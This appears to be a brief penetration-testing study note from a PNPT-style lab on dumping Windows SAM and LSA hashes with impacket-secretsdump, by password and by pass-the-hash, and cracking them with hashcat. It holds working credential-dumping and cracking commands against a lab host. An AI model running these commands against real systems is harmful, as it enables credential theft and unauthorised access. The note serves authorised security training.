Dumping and Cracking Hashes

Overview

After compromising a Local Administrator account, we can dump hashes from he SAM and LSA on the machine using secretsdump. This can be done using the accounts password or hash.

We can then crack the hashes using hashcat

On older machines that have wdigest enabled, there is a possibility to view passwords in clear-text

Secretsdump

impacket-secretsdump PNPT.local/greg:'Password1'@192.168.1.130

imapcket-secretsdump administrator@192.168.1.130 -hashes 'aad3b435b51404eeaad3b435b51404ee:7facdc498ed1'

hashcat -m 1000 crackme.txt ~/rockyou.txt -O -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule